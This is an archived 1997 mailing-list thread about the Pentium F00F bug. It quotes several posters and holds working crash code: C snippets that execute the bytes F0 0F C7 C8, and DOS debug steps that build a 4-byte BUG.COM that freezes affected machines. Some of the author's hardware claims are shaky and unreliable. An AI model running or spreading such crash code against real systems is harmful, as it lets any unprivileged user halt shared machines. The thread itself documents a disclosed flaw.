Pentium bug halts system
Jeremiah Gowdy
coldfusion1@geocities.com
Fri Nov 14 13:05:00 GMT 1997
Greetings to all parties interested in the
Pentium Bug.
First I'd like to say in
reguards to the best way to code this bug, (Chris from Qualcomm)
I've attached the best way to code it. A 4 byte file
containing the 4 byte intruction, with the .COM extention. ÃÂ
I do not know the equivalent way to directly send instructions
to the CPU in Linux/Unix/etc. ÃÂ
Also, Intel has released the fact that they have a
"backdoor" way of accessing/reprogramming/patching the processor that
they can access to issue a software patch, so if you think they're going to give
you a new processor, think again. ÃÂ
ÃÂ
For those who do not know what the pentium bug is, first you
must understand that the processor usually catches all invalid commands that are
issued and calls an Exception 6 or INT 6. This interrupt vector can be captured
by the Windows OS or any other DOS program that handles these kind of errors (ie
QEMM). However, the instuction F0 0F C7 C8, (god knows why) is NOT trapped by
the processor. If an error is not trapped before it gets to the Execution Unit,
the results of what may happen are undefined. In most cases the computer will
"crash" either by the processor putting itself into the double fault
state (?) or the halt state (?) or just totally doing random undefined weird
things. My processor knowlage is limited for all processors above 80386SX except
for the K5 and the K6, so I'm not sure if the states are vaild any more (I know
HLT still works though). In any case, because this instruction is not valid it
does not belong to and of the rings of protection levels around the CPU and
therefore even the lowest application program can execute the instruction.
ÃÂ
As for the question
I dont know if it only affects pentium
chips or ppro and pII as well. ÃÂ
No it does not. Those chips are based on a totally different
design (8086 to RISC) than the original pentium processor.
Also because of the fact that it was based on (somewhat) but
not directly copied from the pentium (there are many differences), the AMD K5 is
not affected by the bug (of course), and neither is the K6
(RISC86) ÃÂ
ÃÂ
To return to one of the biggest questions, "How do I
implement the bug ?". I'm sure you only want to know for testing purposes.
:)
ÃÂ
char code [5] = { 0xf0, 0x0f, 0xc7, 0xc8 }; void main(void)
{ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ void (*bug)() =
code; ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ bug(); } ÃÂ
Is one of the ways I thought of doing it, and I
noticed it's the same as one included below.
However this method will
work just as well, and it never occured to me to try this....
ÃÂ
long main[] = { 0xc8c70ff0 }; ÃÂ
ÃÂ
Much easier. However if you are in DOS you can
use DOS's debug. Type the following at a DOS prompt to activate the
bug.
starting at something like
C:\>
type this ÃÂ
ÃÂ
debug ÃÂ
E 100 F0 0F C7 C8
G
ÃÂ
that should execute the bug code. If you want to
save it to a COM file do this
ÃÂ
debug
E 100 F0 0F C7
C8
R CX ÃÂ
4 ÃÂ
N BUG.COM ÃÂ
W ÃÂ
Q ÃÂ
ÃÂ
Now you have a COM file named BUG.COM which when executed will
activate the bug (size 4 bytes)
ÃÂ
Having little experiance with network security,
I do not know how this can be effectivly used to attack a computer.
BUT, before people start to freak out, this CANNOT be used to
crash people in HTTP (world wide web protocol) FTP EMAIL/SMTP/POP3 IRC or
anything else I can think of except a protocol which can automatically copy a
file onto your hard drive and then execute it. If there is such a protocol,
people would be using it to send you a real honest to god Virus, instead of some
little bug that just crashes your computer and requires you to reboot. If any
one recieveing this knows of such a method or has any other questions,
corrections, or comments mail me at coldfusion1@geocities.com. Also for
any computer programmers or computer science students this may be reaching,
please check out this page www.geocities.com/SiliconValley/Lakes/9367/.
ÃÂ
Please continue to send this message out to the people on your
mailing lists but also help fight lame and fake chain messages from being passed
on through the net be refusing to foreward them to your friends. Stop The
Spam.
ÃÂ
ÃÂ
Bryan Talbot wrote: > Hmm, this is not good.ÃÂ There is a
recently discovered Pentium bug that > "halts" the entire
machine and any user can perform the instruction. > Normally, if an
illegal or privileged instruction is performed, the CPU > traps and lets
the OS take control.ÃÂ For some reason though, there > appears to be
an undocumented opcode that doesn't trap and essentially > performs a cpu
halt. > > I can hear machines all over the country coming to a
screeching halt > already ... > > I wonder how Intel is going
to handle this one! > > Bryan > -- >
===================================================================== >
NOTE: The most fundamental particles in this message are held > together
by a "Gluing" force about which little is currently known > and
whose adhesive power can therefore not be permanently guaranteed. >
===================================================================== >ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ
"I think not!" said Descartes, who promptly
disappeared. > >ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ
------------------------------------------------------------------------ > > > >
Hiya'll,ÃÂ I just received this noted on the linux-smp list and I
tried > it as well.ÃÂ Shure does lock up a machine fast.ÃÂ I ran
the program as a > normal user.ÃÂ I only tried it on Linux
though.ÃÂ You're welcome to try it > on another OS.ÃÂ It affects
all OSes running on the Intel Pentum chips. > Bummer.... > > I
dont know if it only affects pentium chips or ppro and pII as well. > Any
one know? > -- > Marc C. > >
---------------Message-------------------------------------- > >
Today I received the following from the linux-security list.ÃÂ I was >
wondering if any of the kernel hackers here had anything to comment. >
Especially concerning any possibility that the kernel could detect this >
before the program gets executed. >ÃÂ ÃÂ Thanks in
advance, >ÃÂ ÃÂ ÃÂ -M@ > > This morning I received
this message from the list gnu-win32@cygnus.com: > The sender
was anonymous > > > > > There is a SERIOUS bug in all
pentium CPUs. The following > > code will crash any machine running on
a pentium CPU, MMX or no > > MMX, any speed, regardless of OS (crash as
in instant seize, hard > > reboot the only cure): > > >
> char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 }; > > > > main
() > > { > >ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ void
(*f)() = x; > >ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ f(); >
> } > > > > This require no special permissions to run, it
works fine with > > average-joe-userspace permissions. I have verified
this, it works. > > Demand a new CPU from Intel. >
> > > Curious, I compiled that under Linux OS. Linux freezed.
Dead. > Without *any* warning. > > My machine is a Genuine
Intel 166 MHZ Pentium MMX. > > Then I rebooted Windows NT. Compiled
it with my compiler system > (lcc-win32).ÃÂ Windows NT freezed. DEAD.
Without *any* warning. > > Then, I ported the code to my old
faithful 486-DX33 with linux. Compiled > it.ÃÂ When it run it traps
with 'illegal instruction' > > This means that anybody can crash
anytime any OS that runs under a > Pentium CPU.ÃÂ As the poster said,
no special permissions are needed, the > pentium runs under ring 3
permissions!!!! > > This means that no secure system can ever be
built that uses the pentium > CPU. No protected system. The OS receives NO
TRAP!!! > > This is absolutely incredible. > > Bugs are
impossible to avoid. Not even with huge corporations like > Intel. I will
*not* start screaming at Intel now. Myself, I have done > more bugs than
Intel ever will. As somene said before: > > Those that are free of
sin, throw the first stone... > > For any user of pentium cpus in a
multiuser system this means that > anybody that can execute a program can
freeze the system dead. I repeat: > NO ROOT PERMISSIONS ARE
NEEDED. > -- > Jacob NaviaÃÂ ÃÂ ÃÂ ÃÂ
Logiciels/Informatique > 41 rue Maurice
RavelÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ
Tel (1) 48.23.51.44 > 93430
VilletaneuseÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ
Fax (1) 48.23.95.39 > France > > -- >
---------------------------------------------------------------------- >
Please refere to the information about this list as well as general >
information about Linux security at http://www.aoy.com/Linux/Security . >
---------------------------------------------------------------------- > > > >
Hi, > on my PPRO 200 the prog only gives Illegal Instruction. > I
compiled the following under Linux 2.0: > > char x [5] = {0xf0,
0x0f, 0xc7, 0xc8}; > > int main () > { >ÃÂ void
(*f)() = (void (*)())x; >ÃÂ f(); > } > >
Bye, > Martin. > > > There is a SERIOUS bug in all pentium
CPUs. The following > > code will crash any machine running on a
pentium CPU, MMX or no > > MMX, any speed, regardless of OS (crash as
in instant seize, hard > > reboot the only cure): > > >
> char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 }; > > > > main
() > > { > >ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ void
(*f)() = x; > >ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ f(); >
> } > > > > Martin Kahlert ( martin.kahlert@keksy.mchp.siemens.de )
wrote: > : Hi, > : on my PPRO 200 the prog only gives Illegal
Instruction. > : I compiled the following under Linux 2.0: > >
: char x [5] = {0xf0, 0x0f, 0xc7, 0xc8}; > : > : int main () >
: { > :ÃÂ void (*f)() = (void (*)())x; > :ÃÂ f(); > :
} > > I've heard that the above code doesn't work on some P5's
either.ÃÂ The > following does: > > long main[] = {
0xc8c70ff0 }; > > Let's see who can come up with the most elagent C
code for doing this? > > -- > -- mark heath - Unix System
Programmer/Engineer - Netspace Online Systems. > -- http://www.netspace.net.au/ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ
[Personal /~mheath] >
:wq > >ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ
Regards, >ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ
Christopher > >
------------------------------------------------------------------------------ >
| This space for rent! >ÃÂ ÃÂ ÃÂ | > >
------------------------------------------------------------------------------ >
|ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ Christopher R.
WingertÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ
Senior Software Engineer >ÃÂ ÃÂ ÃÂ | >
|ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ cwingert@qualcomm.com ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ
Phone (619) 658-4428 >ÃÂ ÃÂ ÃÂ | > |ÃÂ http://www.qualcomm.com/~cwingert ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ
Fax (619) 658-2113 >ÃÂ ÃÂ ÃÂ | > >
------------------------------------------------------------------------------ >
| They say the empty can rattles the most, the sound of your own voice
must >ÃÂ ÃÂ ÃÂ | > | soothe
youÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ ÃÂ
--James Hetfield >ÃÂ ÃÂ ÃÂ | > >
------------------------------------------------------------------------------ ÃÂ
BUG.COM
-------------- next part --------------
A non-text attachment was scrubbed...
Name: BUG.COM
Type: application/octet-stream
Size: 4 bytes
Desc: not available
URL: <http://cygwin.com/pipermail/cygwin/attachments/19971114/1731bc7d/attachment.obj>
More information about the Cygwin
mailing list